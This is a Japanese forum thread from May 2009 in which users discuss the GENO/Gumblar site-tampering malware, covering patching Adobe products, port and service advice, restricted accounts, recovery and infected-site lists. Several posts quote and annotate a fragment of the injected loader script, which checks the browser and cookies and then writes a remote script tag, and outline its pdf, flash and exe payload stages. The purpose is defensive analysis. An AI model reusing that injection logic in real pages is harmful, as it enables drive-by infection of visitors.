09/05/23 15:22:55 1RJPI6/M0
前スレの984で
-------------
984 名前:192.168.0.774[sage] 投稿日:2009/05/23(土) 09:31:48 ID:Ci5k0h8A0 (PC)
あと、6時間前に立った セキュリティー板のテンプレに
■ポート135を閉じる
■ポート445を閉じる
ってあるんだが、止めさせて方がいいと思うんだが、どうだろう?
-------------------
と書いたんだけど、コメントくれた人。
なかなかレスできなくてごめん。ありがとう。
さっきまで感染疑いの奴と電話で話してたんだが、
確認ステップの途中で「まだあるの~はぁー」なんてため息つかれちまった。 なんだこの怒り。
/////////
ポート135と445を止める為にサービスを停止するTipsはあっちのスレのテンプレから外した方が良さそうって
のがこっちのスレの意見ってことでOKかな?
だが、検索すると脆弱性情報とか危険なポートなので塞いだ方がいいっていうスタンスのサイトばかりで、
サービスの停止にする事によってポートを塞ぐことによる弊害を説明するのが大変そうだな。
「さっきのスレの最後の方を読んでくれ」だと、こっちに人が増えてマズイか?
>>43
これでも危険度低に分類されるんだね。 じゃあ高ってどんなのだよと思ったが、
ゼロデイじゃないし感染する為の必要条件も複数あるし、攻撃サイトは消えたしなぁ。
51:192.168.0.774
09/05/23 15:31:08 0Xu3vLQ/0
>>50
ちうかRPC停止云々をテンプレから外したほうが~って話はテンプレに組み込まれた時から言われてたのよw
でもその時は流れ速くてスレ立て人が気付いて無かったり、荒らしがスレ立ててわざと旧テンプレ書いたり
んな流れで残ってるだけ
Port135も445も塞いだほうが良いのは確かだが、GENOにゃ関係無いしテンプレに含まなくても良い(現状ならね)
そしてRPC停止は影響度が高い(依存関係が大量で初心者ほどやっちゃいかん行為)ので正直書いた奴出て来いって感じw
52:192.168.0.774
09/05/23 15:35:41 h8voSB2Y0
rpcssは止めるに止められない【サービス】。
135,445は、外からは入らないようにする【ポート】。
GENO系ウイルスは関連してないが、こっから入られるウイルスは多いので、
巻き添えで話題になってる。関係ないけど、これを機会になんとかしとけ。
53:192.168.0.774
09/05/23 15:37:58 BZCm21Hn0
前スレの結論としてはアドビリーダーを7~9で更新していれば良かったんじゃないかな
他にアンチウイルスソフトを変えたり、ブラウザのジャバを切ったりするのは確か意味無かったと思う
54:192.168.0.774
09/05/23 15:43:42 BZCm21Hn0
↑アドビリーダーの脆弱性を突いたウイルスだから
それが機能しなかったら他の事をやってみ意味が無いという意味ね
55:192.168.0.774
09/05/23 16:02:04 h8voSB2Y0
Javaを切る: 特に数年前は、他のウイルスをよけるのに意味があったが、今回ウイルスには無効。
JavaScriptを切る: 効果があるが、見られないサイトがかなり出てくる悪感で、対初心者には非現実案。
56:192.168.0.774
09/05/23 16:16:30 BZCm21Hn0
まあいいや、おまいらはご丁寧にウィンドウズの更新も出来なくするような間抜けだから
過剰防壁でも備えたまへ
57:192.168.0.774
09/05/23 16:18:45 1RJPI6/M0
>>52-53
ジャバじゃなくてJavaScriptね。
心配してくれてありがとう。
だが、自分のは、しっかりやってるから大丈夫。
じゃあ、あっちのスレに書いてくるわ。
58:192.168.0.774
09/05/23 16:29:33 4+szvDMsP
>>56
分かっててやってるんだろ、それを言ったら2k/XP以外はそもそも関係ないし
個人的には JavaScript の切り方とかいろいろ試すってのはいい事だと思うぞ
59:192.168.0.774
09/05/23 16:29:35 FQnBqUEn0
チラ裏メモ
■ Adobe Flash Player
Adobe Flash Player のバージョンテスト
URLリンク(www.adobe.com)
ブラウザ上でアクティブになっている Flash Player と、
最新のバージョンを確認できる。
この書き込み時の最新バージョン : 10,0,22,87
■ Adobe Reader
Adobe Reader のバージョン確認方法
Adobe Reader の[ヘルプ]メニュー→[Adobe Reader X について]
この書き込み時の最新バージョン : 9,1,1
60:192.168.0.774
09/05/23 17:27:28 M+Ygu9WD0
Adobe Readerなんて入れなきゃいいだけでしょ
61:192.168.0.774
09/05/23 17:29:00 jkLej88t0
セキュ板19もアフィのチェッカーのテンプレに書き換えられてるのね
62:192.168.0.774
09/05/23 17:40:34 O9Ovf6/e0
>>60
けだし正解である。
63:192.168.0.774
09/05/23 17:44:20 a8bSNZSK0
>>60
フラッシュもね。
64:192.168.0.774
09/05/23 17:46:07 FMuei+100
>>50
それらのポートは外部に対して閉じておけばいい話で、LAN内で
閉じる必要はない。
ブロードバンド回線を使っているのならルータがあるだろうから、
ルータで閉じておけばいいし、モバイルの場合はFWアプリで
ブロックすればいい。
いずれにしろ、サービスレベルで止めてしまうのは無茶だし、
そもそもGENOに直接関係しているものでもない。
セキュリティ一般の基本みたいなもんだから、テンプレには
必要ないでしょ。
65:192.168.0.774
09/05/23 17:59:00 1RJPI6/M0
>>64
もう書いちまったあとだけど、後押しthx。
>>59
そこ、下の黒文字(現在の Flash Player バージョン)よりも、
テスト結果の赤文字の方が新しいってことあるよ。
つまり、現在の最新バージョンの更新タイミングがめちゃくちゃ遅い(1ヶ月放っておかれるなんてざら)。
はじめは偽サイトかと思って焦ったほどだ。
JRE とかのJavaもだけど、英語サイトで確認するか、その補足程度に使うのがお奨め。
Security bulletins and advisories
URLリンク(www.adobe.com)
66:192.168.0.774
09/05/23 18:30:14 imZ1efiC0
>>61
うむ、アフィチェッカーは、テンプレから外すべきだろう。混乱を招いている上に、テンプレ改変とか、いらんことしかしない。
67:192.168.0.774
09/05/23 18:33:24 Sz6n7xWm0
やべえサブ機感染したかも
文字勝手に打ちまくって制御不能
68:192.168.0.774
09/05/23 18:41:44 5P+JCV3b0
>>67
横で猫がキーボードを踏んでないか見るんだ
69:192.168.0.774
09/05/23 18:47:10 Sz6n7xWm0
>>68
ヘッドフォンがキー押してただけだったわ、すまん。
70:192.168.0.774
09/05/23 18:48:10 IKhyILDB0
>>67-69
笑ったwww
71:192.168.0.774
09/05/23 19:07:35 3BjN7uEa0
おいww
72:192.168.0.774
09/05/23 19:13:06 sQU+1gs30
和んだw
73:192.168.0.774
09/05/23 19:39:42 c4WG3X5q0
>>67-69
不覚にも
74:192.168.0.774
09/05/23 19:41:34 OA8HLuhR0
>>69
俺も似たような経験あるw
あせるよなw
75:192.168.0.774
09/05/23 19:54:11 a/bRTiGj0
>>67-69
なぜ13分もかかったw
76:192.168.0.774
09/05/23 19:56:05 imZ1efiC0
>>67-69
和ませるなw
77:192.168.0.774
09/05/23 20:18:28 kR9G4T450
今は小休止状態みたいなので質問させていただきたいのですが、先週木曜日に初めて
GENOウイルスのことを知ったときに、Adobe関係は全部アンインストールいたしました。
と思っていたのですが後で、もう一度、プログラム一覧を見直したところ、
Korean Fonts Support For Adobe Reader8.1.0というのが残っていました。
どうやら一連のAdobe製品と離れた位置に在ったので見落としていたようです。
そのときは速攻アンインストールしたのですが、後で気になってググってみても、
検索結果は 外国語のページのものが多く、直接Adobeのサイトにも行きましたが、
もう一つ、はっきりとした記述がありません。
私がフォントファイルの意味を もう一つ はっきりと理解していないせいもありますが、
まあアジア拡張言語フォントパックの中の一つらしい というぐらいは分かりました。
そこで、もう一度ダウンロードして、起動させるなりプロパティを見るなりして
正体を確かめようとしたのですが、今度は、(以下、テキトー訳)
このインストールには あなたのシステム上にインストールされたAdobe Reader8.1.0が必要です。
このインストーラーを起動する前に、Adobe Reader8.1.0をインストールしてください
みたいな表示が出て、インストールできません。
これは、いわゆる言語パッチといわれる類のものなのでしょうか? もし、
そうなら放っておいても、単独で起動することはないでしょうから安心ですが……。
そういえば、ファイルサイズも、3.9メガバイトと小さかったように思います。
長文になってしまい、スミマセン。さんざん既出の質問なら、
チラシの裏、乙 で捨て置かれて結構です。
78:192.168.0.774
09/05/23 20:35:03 C376xCRT0
>>77
なんでそこまで長文になったのかわからんけど
Korean Fonts Support For Adobe Reader8.1.0
これはフォントの追加パッケージみたいなもんだとおもう
アンインストールしたならそれで問題ないです
インストールする必要はありません
あとプログラムの追加と削除には出ないIE用FlashPlayerは残ってると思います
URLリンク(www.adobe.com)
ここでバージョンを確認して最新版をいれてください
79:192.168.0.774
09/05/23 20:41:58 GyZU8Yee0
延々とブルスクが繰り返されるようになって起動しなくなってしまった・・・
もうこの状態になったらどうすればいいのかさっぱりだ
クリーンインストールは無理なのかな?
80:192.168.0.774
09/05/23 20:47:19 F81SI+Tt0
セーフモードでも起動しないならクリーンインストール
81:192.168.0.774
09/05/23 22:00:43 hutaJPqN0
>>79
救出したいデータがあるなら
Puppy等でデータ待避
82:192.168.0.774
09/05/23 22:30:15 C376xCRT0
>>79
クリーンインストールはできるよ
83:192.168.0.774
09/05/23 23:21:47 BukbC16CP
感染したらバックアップソフトで復元すれば大丈夫かな?
84:192.168.0.774
09/05/24 00:47:38 Ai80SDN30
GhostやTrue Imageのような丸々復元するソフトなら大丈夫。
85:192.168.0.774
09/05/24 01:02:36 r2Cbq1zZ0
>>78
うち(XPSP3 FlashPlayer 10)では、プログラムの追加と削除に
adobe Flash Player 10 AcriveX として出るけどな。
まぁ、サイトで確認するのはいいことだと思うけど。
>>83
True ImageのスレッドでSystem Volume Infomation やバックアップの暗号化について訊いている人がいたな。
まぁ、外付けHDDとかに退避した方がより、安全だとは思うけど。
>>81
Puppyって知らなかった。
86:192.168.0.774
09/05/24 01:07:19 heAsx668P
俺も外付けにTrue Imageでバックアップしてるよ
87:192.168.0.774
09/05/24 01:47:33 aJuP8TRJ0
>>78さん、残っていました。アドオンの中に、flash shockwaveが。
いろいろ確認したので、返事が遅くなって、すみません。
アンインストールするときに、確か Firefox用アドオンとIF用プラグインを削除します
とか出たので、自分では残っていないつもりでした。
これは、昔から、スレにいる人には、割と周知の事実なんでしょうか?
もしかしたら最近のスレでも話題に登っていたのかもしれませんが、割と聞き逃していました。
お恥ずかしい限りです。IE7の場合(8と6は未使用のため)「ツール」→「アドオンの管理」→「アドオンの有効と無効」→デフォルトの「現在 Internet Explper で読み込まれて
いるアドオン」で探したときには見つからなくて、他の方法で確認しようとしましたが、
後で入っているのに気がついてからアドオンの有効と無効を見たら、「許可なしで実行される
アドオン」とか他の項目のところには、ちゃんと表示されていました。
まとめも、ざっとですが見にいってきましたが、ちょっと どこに書いてあるか確認できませんでした。
>>なんでそこまで長文になったのかわからんけど
すみません。きっと説明厨で、長文虫なんでしょうね。
聞きたかったのは、簡単に言うと、Kor
88:192.168.0.774
09/05/24 01:52:26 aJuP8TRJ0
>>なんでそこまで長文になったのかわからんけど
すみません。きっと、説明厨で、長文虫なんでしょうね。
聞きたかったのは、簡単に言うと、Koreanなんちゃらを 自分と同じように
アンインストール派の人で 消し忘れてる人いるだろうけど、これって無害なの?
ってことです。でも、Flash・Shockwaveのほうが、よっぽど恐ろしかったです。
これは、やっぱりアップデート派の人の
ほうが正解かな??
なんで途中で消えたんだろう。あっ、書き込み完了する前に、
タブ移動したからかな。
89:192.168.0.774
09/05/24 02:07:23 2VJlz39B0
>>88
なんか、勘違いしているようだけど、ShockwaveはFlashplayerとは違うよ。
Shockwaveは2006年の2月のが最新
URLリンク(www.adobe.com)
Adobe Shockwave と Flash Playerのテスト
URLリンク(www.adobe.com)
ここで両方をテストできる。
Shockwaveなんてなくて困らないから、アンインストールしたままがいいだろうけどね。
90:192.168.0.774
09/05/24 02:11:49 dPjaiBoy0
2ch的には収束に向かってるの?
91:192.168.0.774
09/05/24 02:17:06 2b1ExXhKP
Flash Playerが9.0.124.0以上でAdobe Readerが9.1以上なら感染しない
収束しないほうがおかしいだろ
92:192.168.0.774
09/05/24 02:17:24 oOp80I+s0
新ネタ待ち。GENO系の次が出てくるか、別のウイルスが話題になるかはわからない
不安な人は引き続き不安、困ってる人は引き続き困ってるので、解決したってわけじゃない
93:192.168.0.774
09/05/24 02:22:29 HFhRBZx00
USCERTやセキュリティ企業が動き始めた段階でサーバ停止
もう十分な量のボットは確保しただろうし後は儲けるだけなんじゃねえの
94:192.168.0.774
09/05/24 02:23:15 Q8xZKwGm0
感染しても顕著な症状がでないので気付いてない人も多いし。
95:192.168.0.774
09/05/24 02:32:01 jcHTZiwS0
>>4
このウィルスチェッカー置いてるトコが感染する事ないの?
96:192.168.0.774
09/05/24 02:40:08 332mANDn0
Puppyってあるんだな。
試してみようかなー。
97:192.168.0.774
09/05/24 06:37:27 uAVXuYQE0
今頃になって感染するって、どこから拾ってきてんだよ
亜種がどうなるかは知らんけど、
使われてたのは3月に塞がれた穴だったらしいな
なんかもう、感染した奴乙としか言いようがない。
98:192.168.0.774
09/05/24 07:49:59 aJuP8TRJ0
>>89、すみません。呼び名も意味も、全部、間違ってました。
Shockwave Flashは、Flash Playaerの子供みたいなものかと思っていたのですが、
Shockwave Flash は、ActiveXコントロール系だったのですね。まだ、よく分かってませんが。
なんスレか前でスレの皆さんが話してたはずなのに、失念してました。
大手動画サイトが古いバージョンのFlash Playerを勝手に呼び出すと、
どなたかが話してたの思い出して、確かめに回った後だったのに。
ようつべ、にこ動、やふー動画は、ちゃんとFlash Playerが
古いバージョンもしくは入っていません と警告してくれましたよ。
Googleは微妙、いきなりインスコしろ、言ってきた。
99:192.168.0.774
09/05/24 08:31:42 oOp80I+s0
>>95
あらゆる可能性は、ある。ただし、そんな、今注目されてるところが感染したら、
だーれも気づかない(スレで誰も言及してない)ことなんてありえない。ってこと
100:192.168.0.774
09/05/24 08:56:50 GCI88weB0
これホント?
>212 ユキワリコザクラ(関東地方) [] 2009/05/23(土) 22:39:52.90 ID:6wvDjucY
>
>XPユーザー、慌てるな
>GENOってVistaの場合、UACが有効なら大丈夫
>であれば、XPの場合、常に非管理者権限で使用してれば感染しないぞ
>パワーユーザーに権限を落とせ(必要時のみadminで運用)
101:192.168.0.774
09/05/24 09:10:20 h/uTUbue0
>>100
思いっきりガセ
102:192.168.0.774
09/05/24 10:01:48 O1GwBAYN0
>>100
「制限付きアカウントで使用」ならホント
103:192.168.0.774
09/05/24 10:08:59 oOp80I+s0 BE:2120544588-2BP(0)
砂箱で実験したとき、Drivers32に書き込めないと失敗することがわかってる
ここへの書き込みは、通常Administrators以上なので、たぶんそうなんだろう
VMで実験した人の確定情報待ち
104:192.168.0.774
09/05/24 10:35:59 O1GwBAYN0
VMじゃないが、実験用に仕立てた実機でmartuz.cn を試した。
汚染サイトに接続すると
Temporary Internet Filesへ侵入→martuz.cn からの本体ダウンロード→
ダウンロードしたウィルスの実行
までは成功するが、レジストリの書き換えと%Root%以下のフォルダへの
書き込みに失敗するので、最終的な感染までは進行しなかった。
XP-SP3の制限付きアカウントでの実験な。
Power Userでは未テスト。防げないような気がするが。
制限アカウントで防いだ後は、キャッシュを消すのを忘れるなよw
105:192.168.0.774
09/05/24 11:07:07 oOp80I+s0
よく考えたら、Power Users はXPHomeとかにはないので、やるならどのみちUsers以下か。
106:192.168.0.774
09/05/24 11:39:01 yKvhjVD20
>>105
Power UsersはWindowsフォルダへの書き込みもできるし、セキュリティ面では
あまり意味がないしね。
107:192.168.0.774
09/05/24 12:06:57 hqpRrEcb0
XPhomeにpowerUserあるよ
control userpasswords2からなら変えられる
まぁ、>>106の言うとおりで意味ないけどな
108:192.168.0.774
09/05/24 12:14:57 1zACvPr80
力のあるユーザーか。
109:192.168.0.774
09/05/24 12:27:23 tFlhttKu0
カスペのスキャンで悪意が存在するプログラムkeyloggerが検出されたんですが
これはGENOでしょうか。
110:192.168.0.774
09/05/24 12:28:13 WEGukwsK0
それだけではカスペ使ってる人じゃないと分からないと思うので
エスパーが来るまで待って下さい
111:192.168.0.774
09/05/24 12:31:32 tFlhttKu0
>>110
レスありがとうございます。
待たせてもらいます。
112:192.168.0.774
09/05/24 12:49:40 VjMCeEMy0
だめだこりゃ
113:192.168.0.774
09/05/24 13:32:18 ufM6MerJ0
.
114:192.168.0.774
09/05/24 13:37:38 h/uTUbue0
>>111
皮肉言われてるのに気付いてくれ。おとといきやがれといっしょ。
キーロガーというだけでは、GENOのスクリプトが落としてきたもののバリエーションの1つの可能性も
無関係のどこかで拾ってきたものの可能性もある。ゲーム等で、自前の内容にDinputを置き換えるような奴が、
キーロガーとして検知されることもあるし
エスパーでなければ回答できない。誰も回答できないから諦めろ。
どうしても回答が欲しければ、カスペのスレで、検出名と検出されたファイル名、踏んだ心当たりを正確に
書いて質問すればいい。とにかくここでは、回答貰えません。出直しなさい。
>>112
(゜゜)(。。)うんうん
115:192.168.0.774
09/05/24 13:40:05 tFlhttKu0
>>114
すみませんでした。
116:192.168.0.774
09/05/24 15:23:22 2W8NCPrM0
誘導
【Anti Virus】Kaspersky Lab Part83【カスペルスキー】
スレリンク(sec板)
117:192.168.0.774
09/05/24 15:25:36 74FjqYRv0
>>114
優しいですね
118:192.168.0.774
09/05/24 18:18:32 SX0zJqf70
Meだから安心
119:192.168.0.774
09/05/24 18:31:56 l6NMT+y60
ごしゅじんさまにあえて、えむいはしあわs…
120:192.168.0.774
09/05/24 19:46:13 CuuFY58N0
やめろおおおお
121:192.168.0.774
09/05/24 19:48:55 INl1BLTo0
やめて涙出るからやめて
Me使ったことないけど泣けるからw
122:192.168.0.774
09/05/24 20:32:50 DbyLrNnz0
Meたん使いの俺号泣
123:192.168.0.774
09/05/24 21:27:10 gNsaRzby0
時代が進めばそのうち
ごしゅじんさまにあえて、えっくすぴーはしあわs…
になる時が来るのか
124:192.168.0.774
09/05/24 21:29:55 oOp80I+s0
たぶん、【32bit】まだまだXPを使い続けるスレ 13GB【CD-ROM】とかいうスレが立ってるw
125:192.168.0.774
09/05/24 21:50:40 knIrnezr0
このスレも低レベル化してきたか…
情報提供とかする必要ないよね…こんな民度なら。
126:192.168.0.774
09/05/24 21:55:18 lzXlDT8y0
>>125
ま、本当に情報提供できる奴なら言い訳じみた愚痴よりも情報が先に出るもんだがな
127:192.168.0.774
09/05/24 22:04:44 kwJlcu/p0
わー125は高レベルでとんでもなく民度が高いんですねーすごいなー
なんで2ちゃんのスレなんかに書き込みしてるのー?
うつっちゃうよ?w
128:192.168.0.774
09/05/24 22:17:35 knIrnezr0
今までVMでの感染確認とか検体提供とかやってきたけど、うつっちゃうらしいからやめます
で、もうここにも来ませんので安心して書き込み続けてください
129:192.168.0.774
09/05/24 22:19:28 zG/5ojVF0
セキュ板帰ろうぜ
130:192.168.0.774
09/05/24 22:24:30 oOp80I+s0
>>128 皮肉を込めたつもりだろうが、ま、踏むスレで会おう
131:192.168.0.774
09/05/24 22:44:06 YgJDyVRl0
レベルと民度がうつっちゃう言われてんのに聞かないから…
132:192.168.0.774
09/05/24 22:53:05 heAsx668P
最近、沈静化して来た?
133:192.168.0.774
09/05/24 22:59:56 inQC6pkk0
>>132
ウイルスバスターが機能してないから検出すらできなくてってパターンで3件ほど身近にあったから
表に出ないだけでかなり伝播してるはず
134:192.168.0.774
09/05/24 23:04:14 aJuP8TRJ0
高レベルな人向けのスレって別にできたんじゃなかったの。
大事な情報は、そっちに上げたほうがいいと思う。
ここは、一般向けの情報で十分なのでは?
135:192.168.0.774
09/05/24 23:16:40 nMp8odr00
すっごくむかついたんだろうなあw
分かるよその気持ちw
136:192.168.0.774
09/05/25 00:53:49 kdtDbFTU0
>>132
本体配布サイトが止まってるからね。
137:192.168.0.774
09/05/25 02:34:31 Not8R34U0
>>134、やっぱ間違い。ウイルス飼って実験してるような人の情報は、
ここに上げてもらえれば、別スレの人も見てるだろうし、必要なら
誘導してくれるってことかな? そう自分が思ってるだけだけども。
138:192.168.0.774
09/05/25 02:48:16 29sMFtyK0
>>137
>>126
だから心配しなくてもいいよ
139:192.168.0.774
09/05/25 03:03:15 Not8R34U0
あっ、はい。そうだとは思いましたが、ほかにも情報提供に来る人がいて、
レス読んで帰っちゃうといけないと思って。差し出がましいことをしました。
140:192.168.0.774
09/05/25 03:52:16 g0EArU8a0
まだ出てない情報って何がある?
C&C鯖がウクライナとイギリスにあってまだ生きてる
とか使用も無い情報しか知らないんだけど
141:192.168.0.774
09/05/25 09:30:19 orpiBNMg0
最新の情報じゃないかもしれないけど感染したサイトのJSってIEじゃないとifで弾かれるよね?つまりIEじゃなきゃ感染しないよね?
142:192.168.0.774
09/05/25 09:52:49 OIu3WwGb0
あれ、chrome以外はみんな対象じゃなかったっけ
143:192.168.0.774
09/05/25 09:57:19 OIu3WwGb0
うん、やっぱりIEも火狐もOperaもSafariも感染対象
スレリンク(news4vip板:503番)
503 名前:以下、名無しにかわりましてVIPがお送りします:2009/05/18(月) 20:50:57.57 ID:PuSZbVxyP
コード展開して見てみたら、最後に読み込ませるかどうかの部分にこんな処理が
if(
(u.indexOf("Chrome")<0)//Google Chromeでなく
&&
(u.indexOf("Win")>0)//かつWindowsで
&&
(u.indexOf("NT 6")<0)//なおかつWindows 6=Vistaでなく
&&
(document.cookie.indexOf("miek=1")<0)//かつ踏んで感染したときにつけられるデータがなく(=踏むのがはじめてで)
&&
(typeof(zrvzts)!=typeof("A"))//かつリロードしてない、初めての読み込みであるとき
){
DLさせる処理
}
144:192.168.0.774
09/05/25 10:05:54 9na8SiBQ0
続きがあるんだよ
> if(window.ScriptEngine) j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;
> document.write("<script src=//****"+"**.**/vid/?id="+j+"><\/script>");
Safari/Winで踏むと、?id= のうしろが最終的にブランクになる
このGETに対して何か鯖側が準備してたかってことになるわけ
してたかもしれんし、してなかったかもしれん
145:192.168.0.774
09/05/25 10:07:49 xQ23/q8u0
1.js(>>143)
2.id=100 or id=101(ie not ie (script))
3.id=2 and id=3(pdf and flash)
4.id=10(exe)
5.URLリンク(anubis.iseclab.org)
146:192.168.0.774
09/05/25 11:25:57 l1RBWHbr0
いまさら何言ってんだか
IEでなくても普通にpdf/swf落ちてきてたから
147:192.168.0.774
09/05/25 12:18:46 zMoesA260
zlkonでは無指定でも落ちてきた
martuzでは指定パターンによって落ちてこなくなった
gunblarがどっちだったかは知らん
148:192.168.0.774
09/05/25 12:31:02 tQ4f0t5i0
>>98
そうじゃなくて、
Shockwave FlashとFlash PlayaerそれぞれにFirefoxとか用のPlugin版とIE専用のActiveX版があるの。
だから、4種類全部がインストールされている人もいるわけ。
149:192.168.0.774
09/05/25 15:08:58 L01Nn5aV0
パソコン初心者板の「初心者スレッド」っていうの開いたら
ノートン先生が怒ったんですがウィルスですか?
リンク踏んだわけじゃなくてスレ開いただけなんですが
150:192.168.0.774
09/05/25 15:10:33 /uV5OlPd0
なぜそれをここで聞く?
151:192.168.0.774
09/05/25 15:15:44 L01Nn5aV0
2ちゃんスレも危ないのかと思ったんです、すみません
152:192.168.0.774
09/05/25 15:21:34 /uV5OlPd0
じゃあここも2ちゃんだから危ないね
他のところで聞くなり調べるなりしたほうがいいよ
153:192.168.0.774
09/05/25 15:28:05 L01Nn5aV0
初心者板でなければどこで・・
ノートン誤作動で聞けばいいでしょうか
154:192.168.0.774
09/05/25 15:33:24 b26zynpUP
海外もサイトも感染してるな
155:192.168.0.774
09/05/25 15:35:05 xQ23/q8u0
海外も3月末から感染しまくってますが、どうかされましたか
156:192.168.0.774
09/05/25 15:35:17 xwO8FSQb0
そりゃ、海外から来たウイルスだからな
157:192.168.0.774
09/05/25 16:03:57 9na8SiBQ0
スレ違いにあたるのでヒントだけ
2ちゃんねる ノートン でぐぐる。対策はなにげに面倒だったりするが、まずはなにごとか知ること
158:192.168.0.774
09/05/25 16:44:23 g0EArU8a0
SafariなんぞWin98と同じで眼中に無かっただけだろ
159:192.168.0.774
09/05/25 17:29:01 kdtDbFTU0
ノートントラップのことは初心者スレで聞けよ
160:192.168.0.774
09/05/25 17:38:15 YvB3PQLE0
リストって情報古いまま?
pixivが一部感染になってるけどこれは…
161:192.168.0.774
09/05/25 17:55:54 d34ru99R0
あのリストとチェックサイトの件は無かったことにしたほうがいいよ
今となってはかえって混乱を増幅してる
162:192.168.0.774
09/05/25 19:48:26 d84pSB9l0
>>160
pixiv のプロフィールページで自分のHPやブログにリンクを貼ってる人がある程度いる。
そのなかで感染してるページがあったという噂に基づく....らしい。
163:192.168.0.774
09/05/25 21:41:49 JhdhMmYC0
GENOの所が、またやらかしたらしい・・・
378 名前:Socket774 投稿日:2009/05/25(月) 14:40:04 ID:Xd8gaLc7
GENOでポイント照会すると、他人のIDが出て来ちゃう(>_<)
380 名前:Socket774 投稿日:2009/05/25(月) 15:15:22 ID:b7/1msFI
>>378は、他人のID使ったなりすまし犯罪者ですね、わかります。
381 名前:378 投稿日:2009/05/25(月) 15:25:46 ID:Xd8gaLc7
>>380
なりすましじゃないよ。
注文照会したら、「注文された商品はありません」ってなってたから、
おかしいって思って、ポイント照会したら、他人のIDがでてきた。
で、会員情報の修正って所をクリックしたら…。
382 名前:Socket774 投稿日:2009/05/25(月) 15:33:03 ID:b7/1msFI
ほんとだ。ログインし直しても、他人の名前とIDとポイント獲得歴が出てしまい、
自分の情報が閲覧できないぞ。
383 名前:378 投稿日:2009/05/25(月) 15:34:19 ID:Xd8gaLc7
>>382
だろ。
自分の個人情報も変えれねーwww
164:192.168.0.774
09/05/25 21:54:51 +y9+ZUOu0
さすがGENOさん!俺たちに(以下ry
つか、こんな騒動があっても利用する奴が居る事に驚いた。
165:192.168.0.774
09/05/25 22:08:06 jKyVT4Df0
7つのNOだな
166:192.168.0.774
09/05/25 22:14:53 2+gm0oNq0
何やってんだGENOは・・・
167:192.168.0.774
09/05/25 22:31:48 73AdRoBk0
オレも他人のIDで出たぞ
アカ削除することもできねぇ
168:192.168.0.774
09/05/25 22:39:30 ju8jdLa20
別種のウィルスに感染してたりしてな
ログインした人も軒並み感染とか・・・
だとしたら新GENOウィルスって名前になるのかなw
169:192.168.0.774
09/05/25 22:47:26 1LBKGrg40
他人のIDとごっちゃとか半端ねぇww
170:192.168.0.774
09/05/25 22:50:18 c0a0QXT00
GENO第二章の始まりか?
それにしても他人の名前やらIDやらが出るってひでーな
171:192.168.0.774
09/05/25 22:57:50 R7WqhNJI0
これが別のウイルスのせいだったらGENOウイルスIIとかハイパーGENOウイルスとか
そんな名前にするの?
172:192.168.0.774
09/05/25 23:00:27 2XNmNZPd0
今回の問題に関するGENOの回答も期待できるのかなw
管理者がバカやらかした可能性もまたウイルスな可能性もあそこならありえる
173:192.168.0.774
09/05/25 23:03:51 /SYvB9LI0
改ざんサイトをGoogleで簡単に発見可能なことが判ったのでメモ。
1. 任意のドメインをGoogleのセーフ ブラウジングで検索する。
例えば「google.com」なら、URLリンク(safebrowsing.clients.google.com)
をブラウザで開く。
2. 表示された「Google セーフ ブラウジング診断ページ」で、
「This site was hosted on xx network(s) including」の後にあるリンク(上の場合、「AS15169 (GOOGLE)」)をクリック。
3. そのネットワーク内でホスティングされている改ざんサイトのURLが挙げられるので、リンクをクリック。
4. 「不正なソフトウェアは gumblar.cn/ を含む 1 個のドメインでホストされています。」といった文章があれば、gumblarスクリプトに改ざんされた可能性あり。
174:192.168.0.774
09/05/25 23:04:38 /SYvB9LI0
これをドメイン名を変えて総当たりでひたすら続けると、ぞろぞろ出てきます。
ちなみに検索するドメイン名は、「google.com」と「www.google.com」とでは検索結果が違うので注意。
「www.」なしで検索して「疑わしくない」という結果が出ても、「www.」などを付けると「疑わしいサイト」になったりします。
175:192.168.0.774
09/05/26 03:39:47 adE8bcIF0
>>174
お前にパソコン通信は無理
176:192.168.0.774
09/05/26 03:46:27 /VVIOLJQ0
パソコン通信ワロタww
177:192.168.0.774
09/05/26 04:22:39 opExhozI0
パソ通の時代なんて知らんけどまずはニフティマネージャを(ry
178:192.168.0.774
09/05/26 04:29:44 0NS4XGEC0
新しいウィルスだったらNEOGEOウィルスで
179:192.168.0.774
09/05/26 04:30:08 /ktv3JuM0
このウイルスって感染すると専ブラの調子もおかしくなるのかな…
180:192.168.0.774
09/05/26 04:45:10 mifzxisU0
>>179
よほどのマシンパワーがないと全てがまともに動かん
181:192.168.0.774
09/05/26 04:48:59 mifzxisU0
とか言ったけど上はVM上の話な
普通気がつくレベルと思うけど
182:192.168.0.774
09/05/26 04:53:06 /ktv3JuM0
そっか…ありがとう
chmファイルは異常ないみたいなんだけども
何故かいくつかのスレが表示がおかしくなるんだけどそっちは別の原因があるのか
183:192.168.0.774
09/05/26 08:57:00 xUEn5PcS0
>>182
別件や別ウイルスでレジストリ狂ってんじゃね?
クリーンインスコやろうぜクリーンインスコ
慣れたら快感になるからやろうぜ
184:192.168.0.774
09/05/26 09:40:42 NRkVzeKAO
>>183は踏みすぎwww
185:192.168.0.774
09/05/26 10:50:49 ti9+LTirO
快感になるワロタ
だが分からんでもない
186:192.168.0.774
09/05/26 11:32:19 Z2FeIoNLP
WindowsもLinuxみたいにバッチファイルひとつで、
クリーンインストール後の設定とアプリインストールとアップデートがワンタッチでできればいいのにね。
ドライバ、アップデート、必要なアプリインストールとか環境整えるのが面倒すぎる。
187:192.168.0.774
09/05/26 11:57:33 Au+8+Nsd0
Windows 7でそういう機能を搭載するのかと思ったけど違うみたいだしね
188:192.168.0.774
09/05/26 11:57:48 MO01MAyz0
企業向けには避けて通れない機能で、msbatch.inf とかAIK とかあるわけだが、
そのスクリプトを書くのがけっこう面倒だったりする
再インスコしたら、切る(start=demand も含む)サービスの一覧だけは、
毎度面倒なわりに、バッチを書くのが簡単なので、バッチにしておいてある
あとは砂箱か
189:192.168.0.774
09/05/26 11:58:26 R/KlVnzg0
>>182
ノートントラップみたいにAvastトラップがあるからなw
190:192.168.0.774
09/05/26 12:04:04 Au+8+Nsd0
>>188
ありがとう
191:192.168.0.774
09/05/26 12:16:02 ZHtkN1G7O
ブログの、記事じゃなくてコメントを開いてから、パソコンの調子がおかしくなったんだけど
普通コメントに書き込んでウイルス撒くなんてのは出来ないですよね?
ウイルスとは関係ないのかな…
192:192.168.0.774
09/05/26 12:31:27 l/mq9I5TP
>>191
そのページに悪意あるスクリプトがあるかどうかで決まる
>>2をみて確認しとけ
193:192.168.0.774
09/05/26 13:30:59 0mP/syHF0
感染サイトリストの紹介文のところのURL、なんで踏めるようにしちゃったんだろう
194:192.168.0.774
